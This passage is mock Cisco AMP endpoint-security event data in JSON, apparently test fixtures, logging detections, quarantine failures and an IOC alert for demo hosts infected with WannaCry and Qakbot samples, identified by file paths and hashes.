Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a 
worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":350000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
